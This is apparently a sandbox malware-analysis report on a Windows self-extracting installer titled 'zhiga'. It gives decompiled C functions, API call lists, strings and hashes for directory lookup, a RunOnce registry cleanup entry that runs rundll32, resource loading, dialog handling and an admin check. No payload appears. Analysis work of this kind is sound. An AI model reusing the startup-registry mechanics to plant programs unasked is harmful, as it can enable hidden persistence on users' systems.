                                                                        0x00000000
                                                                        0x00a34628
                                                                        0x00a345cd
                                                                        0x00a345cd
                                                                        0x00a345cf
                                                                        0x00a345cf
                                                                        0x00a345d2
                                                                        0x00a345d2
                                                                        0x00a345d4
                                                                        0x00a345d5
                                                                        0x00a345db
                                                                        0x00a345de
                                                                        0x00a345e3
                                                                        0x00a345e9
                                                                        0x00a345ed
                                                                        0x00000000
                                                                        0x00a345f3
                                                                        0x00a345fd
                                                                        0x00000000
                                                                        0x00a34602
                                                                        0x00a345ed
                                                                        0x00a3457e
                                                                        0x00a3457e
                                                                        0x00a34580
                                                                        0x00a34580
                                                                        0x00a34583
                                                                        0x00a34583
                                                                        0x00a34585
                                                                        0x00a34586
                                                                        0x00a3458a
                                                                        0x00a3458c
                                                                        0x00a3458f
                                                                        0x00a3458f
                                                                        0x00a34591
                                                                        0x00a34592
                                                                        0x00a3459b
                                                                        0x00a3459e
                                                                        0x00a345a3
                                                                        0x00a345a9
                                                                        0x00a345ad
                                                                        0x00000000
                                                                        0x00a345af
                                                                        0x00a345af
                                                                        0x00a345bf
                                                                        0x00a3462d
                                                                        0x00a34630
                                                                        0x00a3463d
                                                                        0x00a3464e
                                                                        0x00a3464e
                                                                        0x00a3463f
                                                                        0x00a34640
                                                                        0x00a34647
                                                                        0x00a3464c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3464c
                                                                        0x00a34666
                                                                        0x00a3466d
                                                                        0x00a3466f
                                                                        0x00a34675
                                                                        0x00a34675
                                                                        0x00a345ad
                                                                        0x00a34527
                                                                        0x00a3452e
                                                                        0x00a3453f
                                                                        0x00a3453f
                                                                        0x00a34530
                                                                        0x00a34531
                                                                        0x00a34538
                                                                        0x00a3453d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3453d
                                                                        0x00a34554
                                                                        0x00a3455a
                                                                        0x00a3455a
                                                                        0x00a3455a
                                                                        0x00a34525
                                                                        0x00a3468c

                                                                        APIs
                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                        • MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A345A3
                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A345E3
                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A3460D
                                                                        • MessageBeep.USER32(00000000), ref: 00A34630
                                                                        • MessageBoxA.USER32(?,00000000,zhiga,00000000), ref: 00A34666
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A3466F
                                                                          • Part of subcall function 00A3681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A3686E
                                                                          • Part of subcall function 00A3681F: GetSystemMetrics.USER32(0000004A), ref: 00A368A7
                                                                          • Part of subcall function 00A3681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A368CC
                                                                          • Part of subcall function 00A3681F: RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,?,0000000C), ref: 00A368F4
                                                                          • Part of subcall function 00A3681F: RegCloseKey.ADVAPI32(?), ref: 00A36902
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                        • String ID: LoadString() Error. Could not load string resource.$zhiga
                                                                        • API String ID: 3244514340-1120439489
                                                                        • Opcode ID: e4796e4bf26b65ed9ba3d76563cd5746d6378aab4b27ec0d55e3c8c0af85778a
                                                                        • Instruction ID: f457f181065cd5d58459071fc2511bfe55b91c820568ff677104d450ac169504
                                                                        • Opcode Fuzzy Hash: e4796e4bf26b65ed9ba3d76563cd5746d6378aab4b27ec0d55e3c8c0af85778a
                                                                        • Instruction Fuzzy Hash: 9E51E572900215AFDB21DF68DC49BBABB79EF49300F144195FD49A7241DB71EE06CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A32773(CHAR* __ecx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v269;
                                                                        				CHAR* _v276;
                                                                        				int _v280;
                                                                        				void* _v284;
                                                                        				int _v288;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t23;
                                                                        				intOrPtr _t34;
                                                                        				int _t45;
                                                                        				int* _t50;
                                                                        				CHAR* _t52;
                                                                        				CHAR* _t61;
                                                                        				char* _t62;
                                                                        				int _t63;
                                                                        				CHAR* _t64;
                                                                        				signed int _t65;
                                                                        
                                                                        				_t52 = __ecx;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t23 ^ _t65;
                                                                        				_t62 = _a4;
                                                                        				_t50 = 0;
                                                                        				_t61 = __ecx;
                                                                        				_v276 = _t62;
                                                                        				 *((char*)(__ecx)) = 0;
                                                                        				if( *_t62 != 0x23) {
                                                                        					_t63 = 0x104;
                                                                        					goto L14;
                                                                        				} else {
                                                                        					_t64 = _t62 + 1;
                                                                        					_v269 = CharUpperA( *_t64);
                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                        					_t63 = 0x104;
                                                                        					_t34 = _v269;
                                                                        					if(_t34 == 0x53) {
                                                                        						L14:
                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                        						goto L15;
                                                                        					} else {
                                                                        						if(_t34 == 0x57) {
                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_push(_t52);
                                                                        							_v288 = 0x104;
                                                                        							E00A31781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                        							_t59 = 0x104;
                                                                        							E00A3658A( &_v268, 0x104, _v276);
                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                        								L16:
                                                                        								_t59 = _t63;
                                                                        								E00A3658A(_t61, _t63, _v276);
                                                                        							} else {
                                                                        								if(RegQueryValueExA(_v284, 0xa31140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                        									_t45 = _v280;
                                                                        									if(_t45 != 2) {
                                                                        										L9:
                                                                        										if(_t45 == 1) {
                                                                        											goto L10;
                                                                        										}
                                                                        									} else {
                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                        											_t45 = _v280;
                                                                        											goto L9;
                                                                        										} else {
                                                                        											_t59 = 0x104;
                                                                        											E00A31680(_t61, 0x104,  &_v268);
                                                                        											L10:
                                                                        											_t50 = 1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								RegCloseKey(_v284);
                                                                        								L15:
                                                                        								if(_t50 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                        			}























                                                                        0x00a32773
                                                                        0x00a3277e
                                                                        0x00a32785
                                                                        0x00a3278a
                                                                        0x00a3278d
                                                                        0x00a32790
                                                                        0x00a32792
                                                                        0x00a32798
                                                                        0x00a3279d
                                                                        0x00a328b2
                                                                        0x00000000
                                                                        0x00a327a3
                                                                        0x00a327a3
                                                                        0x00a327af
                                                                        0x00a327c2
                                                                        0x00a327c8
                                                                        0x00a327cd
                                                                        0x00a327d5
                                                                        0x00a328b7
                                                                        0x00a328b9
                                                                        0x00000000
                                                                        0x00a327db
                                                                        0x00a327dd
                                                                        0x00a328aa
                                                                        0x00000000
                                                                        0x00a327e3
                                                                        0x00a327e3
                                                                        0x00a327ec
                                                                        0x00a327f8
                                                                        0x00a32803
                                                                        0x00a3280b
                                                                        0x00a32831
                                                                        0x00a328c3
                                                                        0x00a328c9
                                                                        0x00a328cd
                                                                        0x00a32837
                                                                        0x00a3285a
                                                                        0x00a3285c
                                                                        0x00a32865
                                                                        0x00a32892
                                                                        0x00a32895
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a32867
                                                                        0x00a32878
                                                                        0x00a3288c
                                                                        0x00000000
                                                                        0x00a3287a
                                                                        0x00a32880
                                                                        0x00a32885
                                                                        0x00a32897
                                                                        0x00a32899
                                                                        0x00a32899
                                                                        0x00a32878
                                                                        0x00a32865
                                                                        0x00a328a0
                                                                        0x00a328bf
                                                                        0x00a328c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a328c1
                                                                        0x00a32831
                                                                        0x00a327dd
                                                                        0x00a327d5
                                                                        0x00a328e5

                                                                        APIs
                                                                        • CharUpperA.USER32(B6B6972C,00000000,00000000,00000000), ref: 00A327A8
                                                                        • CharNextA.USER32(0000054D), ref: 00A327B5
                                                                        • CharNextA.USER32(00000000), ref: 00A327BC
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32829
                                                                        • RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32852
                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A32870
                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A328A0
                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A328AA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A328B9
                                                                        Strings
                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A327E4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                        • API String ID: 2659952014-2428544900
                                                                        • Opcode ID: 4522a2e02ad08300fe347211d0689a491b5ae69b0579a494d5517d1e0eb6f5a9
                                                                        • Instruction ID: 99c9fdc04a22294b732611875cc4edb700a3bf33ea018ec525fa49c2a26cc516
                                                                        • Opcode Fuzzy Hash: 4522a2e02ad08300fe347211d0689a491b5ae69b0579a494d5517d1e0eb6f5a9
                                                                        • Instruction Fuzzy Hash: 18418371A0012CAFDB24DBA49C85BFAB7BDEF65700F0440A9F589D2110DB708E868FA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E00A32267() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v836;
                                                                        				void* _v840;
                                                                        				int _v844;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				intOrPtr _t33;
                                                                        				void* _t38;
                                                                        				intOrPtr* _t42;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				void* _t49;
                                                                        				signed int _t51;
                                                                        
                                                                        				_t19 =  *0xa38004; // 0xb6b6972c
                                                                        				_t20 = _t19 ^ _t51;
                                                                        				_v8 = _t19 ^ _t51;
                                                                        				if( *0xa38530 != 0) {
                                                                        					_push(_t49);
                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                        						_push(_t38);
                                                                        						_v844 = 0x238;
                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                        							_push(_t47);
                                                                        							memset( &_v268, 0, 0x104);
                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        								E00A3658A( &_v268, 0x104, 0xa31140);
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E00A3171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                        							_t42 =  &_v836;
                                                                        							_t45 = _t42 + 1;
                                                                        							_pop(_t47);
                                                                        							do {
                                                                        								_t33 =  *_t42;
                                                                        								_t42 = _t42 + 1;
                                                                        							} while (_t33 != 0);
                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                        						}
                                                                        						_t20 = RegCloseKey(_v840);
                                                                        						_pop(_t38);
                                                                        					}
                                                                        					_pop(_t49);
                                                                        				}
                                                                        				return E00A36CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                        			}



















                                                                        0x00a32272
                                                                        0x00a32277
                                                                        0x00a32279
                                                                        0x00a32283
                                                                        0x00a32289
                                                                        0x00a322ab
                                                                        0x00a322b1
                                                                        0x00a322c4
                                                                        0x00a322e0
                                                                        0x00a322e6
                                                                        0x00a322f5
                                                                        0x00a3230d
                                                                        0x00a3231c
                                                                        0x00a3231c
                                                                        0x00a32321
                                                                        0x00a3233a
                                                                        0x00a32342
                                                                        0x00a32348
                                                                        0x00a3234b
                                                                        0x00a3234c
                                                                        0x00a3234c
                                                                        0x00a3234e
                                                                        0x00a3234f
                                                                        0x00a3236e
                                                                        0x00a3236e
                                                                        0x00a3237a
                                                                        0x00a32380
                                                                        0x00a32380
                                                                        0x00a32381
                                                                        0x00a32381
                                                                        0x00a3238f

                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A322A3
                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A322D8
                                                                        • memset.MSVCRT ref: 00A322F5
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32305
                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A3236E
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A3237A
                                                                        Strings
                                                                        • wextract_cleanup0, xrefs: 00A3227C, 00A322CD, 00A32363
                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A32299
                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A3232D
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A32321
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                        • API String ID: 3027380567-4285006626
                                                                        • Opcode ID: 1f2701dbe645393eb0eec23e905dd44c10d12e8996d190af684700b278a4417f
                                                                        • Instruction ID: 743b5782e046cea0d9a95bd30a70136d29c57022ad95b163e337ec8cdd38ef3e
                                                                        • Opcode Fuzzy Hash: 1f2701dbe645393eb0eec23e905dd44c10d12e8996d190af684700b278a4417f
                                                                        • Instruction Fuzzy Hash: 9231C571A00228BBDB25DB50DC89FEBBB7CEF15700F0401A9B54DAA050EA75AB89CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00A33100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* _t8;
                                                                        				void* _t11;
                                                                        				void* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t33;
                                                                        				struct HWND__* _t34;
                                                                        
                                                                        				_t8 = _a8 - 0xf;
                                                                        				if(_t8 == 0) {
                                                                        					if( *0xa38590 == 0) {
                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                        						 *0xa38590 = 1;
                                                                        					}
                                                                        					L13:
                                                                        					return 0;
                                                                        				}
                                                                        				_t11 = _t8 - 1;
                                                                        				if(_t11 == 0) {
                                                                        					L7:
                                                                        					_push(0);
                                                                        					L8:
                                                                        					EndDialog(_a4, ??);
                                                                        					L9:
                                                                        					return 1;
                                                                        				}
                                                                        				_t15 = _t11 - 0x100;
                                                                        				if(_t15 == 0) {
                                                                        					_t16 = GetDesktopWindow();
                                                                        					_t33 = _a4;
                                                                        					E00A343D0(_t33, _t16);
                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xa38d4c);
                                                                        					SetWindowTextA(_t33, "zhiga");
                                                                        					SetForegroundWindow(_t33);
                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                        					 *0xa388b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00A330C0);
                                                                        					return 1;
                                                                        				}
                                                                        				if(_t15 != 1) {
                                                                        					goto L13;
                                                                        				}
                                                                        				if(_a12 != 6) {
                                                                        					if(_a12 != 7) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_push(1);
                                                                        				goto L8;
                                                                        			}









                                                                        0x00a33108
                                                                        0x00a3310b
                                                                        0x00a331b7
                                                                        0x00a331ca
                                                                        0x00a331d0
                                                                        0x00a331d0
                                                                        0x00a331da
                                                                        0x00000000
                                                                        0x00a331da
                                                                        0x00a33111
                                                                        0x00a33114
                                                                        0x00a33136
                                                                        0x00a33136
                                                                        0x00a33138
                                                                        0x00a3313b
                                                                        0x00a33141
                                                                        0x00000000
                                                                        0x00a33143
                                                                        0x00a33116
                                                                        0x00a3311b
                                                                        0x00a3314b
                                                                        0x00a33151
                                                                        0x00a33158
                                                                        0x00a3316a
                                                                        0x00a33176
                                                                        0x00a3317d
                                                                        0x00a3318b
                                                                        0x00a3319e
                                                                        0x00a331a3
                                                                        0x00000000
                                                                        0x00a331ad
                                                                        0x00a33120
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3312a
                                                                        0x00a33134
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33134
                                                                        0x00a3312c
                                                                        0x00000000

                                                                        APIs
                                                                        • EndDialog.USER32(?,00000000), ref: 00A3313B
                                                                        • GetDesktopWindow.USER32 ref: 00A3314B
                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 00A3316A
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A33176
                                                                        • SetForegroundWindow.USER32(?), ref: 00A3317D
                                                                        • GetDlgItem.USER32(?,00000834), ref: 00A33185
                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00A33190
                                                                        • SetWindowLongA.USER32(00000000,000000FC,00A330C0), ref: 00A331A3
                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A331CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                        • String ID: zhiga
                                                                        • API String ID: 3785188418-3705506974
                                                                        • Opcode ID: 7d88a789e7ca989b01011c2537d3c329746f94862572f8bdc9bdf24db2fff0d2
                                                                        • Instruction ID: 0ad9fe422a4a124a388a6350fc34f751b1f30769c88fc3a6d0cf3bd3b996a657
                                                                        • Opcode Fuzzy Hash: 7d88a789e7ca989b01011c2537d3c329746f94862572f8bdc9bdf24db2fff0d2
                                                                        • Instruction Fuzzy Hash: 1011D03220C321BBDF11DFA4AC0DBAA3A64FB6A721F100710F855D61E0DBB89A42D742
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E00A3468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				long _t4;
                                                                        				void* _t11;
                                                                        				CHAR* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        
                                                                        				_t14 = __ecx;
                                                                        				_t11 = __edx;
                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                        				_t16 = _t4;
                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                        					if(_t16 == 0) {
                                                                        						L5:
                                                                        						return 0;
                                                                        					}
                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                        					FreeResource(_t15);
                                                                        					return _t16;
                                                                        				}
                                                                        				return _t4;
                                                                        			}








                                                                        0x00a34699
                                                                        0x00a3469b
                                                                        0x00a346a9
                                                                        0x00a346af
                                                                        0x00a346b4
                                                                        0x00a346bc
                                                                        0x00a346f9
                                                                        0x00000000
                                                                        0x00a346f9
                                                                        0x00a346d9
                                                                        0x00a346dd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a346e5
                                                                        0x00a346ef
                                                                        0x00000000
                                                                        0x00a346f5
                                                                        0x00a346ff

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                        • LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                        • memcpy_s.MSVCRT ref: 00A346E5
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                        • String ID: TITLE$zhiga
                                                                        • API String ID: 3370778649-3314309
                                                                        • Opcode ID: 787660b419f4b6856fdc05112bf7876a87e66210fbae6870fa7bafa4cf879bb7
                                                                        • Instruction ID: 7585da3eba653d5a6aa345347dbcb721e45ded150858c976967fcde15f7dc967
                                                                        • Opcode Fuzzy Hash: 787660b419f4b6856fdc05112bf7876a87e66210fbae6870fa7bafa4cf879bb7
                                                                        • Instruction Fuzzy Hash: E701A9362442207BE3105BE56C4DF6B7E2CDBDAF51F040415FA8997151CAB1984287B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 57%
                                                                        			E00A317EE(intOrPtr* __ecx) {
                                                                        				signed int _v8;
                                                                        				short _v12;
                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                        				_Unknown_base(*)()* _v20;
                                                                        				void* _v24;
                                                                        				intOrPtr* _v28;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t14;
                                                                        				_Unknown_base(*)()* _t20;
                                                                        				long _t28;
                                                                        				void* _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				signed int _t38;
                                                                        				intOrPtr* _t39;
                                                                        
                                                                        				_t14 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t14 ^ _t38;
                                                                        				_v12 = 0x500;
                                                                        				_t37 = __ecx;
                                                                        				_v16.Value = 0;
                                                                        				_v28 = __ecx;
                                                                        				_t28 = 0;
                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                        				if(_t36 != 0) {
                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                        					_v20 = _t20;
                                                                        					if(_t20 != 0) {
                                                                        						 *_t37 = 0;
                                                                        						_t28 = 1;
                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                        							_t37 = _t39;
                                                                        							 *0xa3a288(0, _v24, _v28);
                                                                        							_v20();
                                                                        							if(_t39 != _t39) {
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        							FreeSid(_v24);
                                                                        						}
                                                                        					}
                                                                        					FreeLibrary(_t36);
                                                                        				}
                                                                        				return E00A36CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                        			}



















                                                                        0x00a317f6
                                                                        0x00a317fd
                                                                        0x00a31805
                                                                        0x00a3180b
                                                                        0x00a3180d
                                                                        0x00a31815
                                                                        0x00a31818
                                                                        0x00a31820
                                                                        0x00a31824
                                                                        0x00a3182c
                                                                        0x00a31832
                                                                        0x00a31837
                                                                        0x00a31851
                                                                        0x00a31854
                                                                        0x00a3185d
                                                                        0x00a31862
                                                                        0x00a3186c
                                                                        0x00a31872
                                                                        0x00a31877
                                                                        0x00a3187e
                                                                        0x00a3187e
                                                                        0x00a31883
                                                                        0x00a31883
                                                                        0x00a3185d
                                                                        0x00a3188a
                                                                        0x00a3188a
                                                                        0x00a318a2

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A318DD), ref: 00A3181A
                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A3182C
                                                                        • AllocateAndInitializeSid.ADVAPI32(00A318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A318DD), ref: 00A31855
                                                                        • FreeSid.ADVAPI32(?,?,?,?,00A318DD), ref: 00A31883
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00A318DD), ref: 00A3188A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
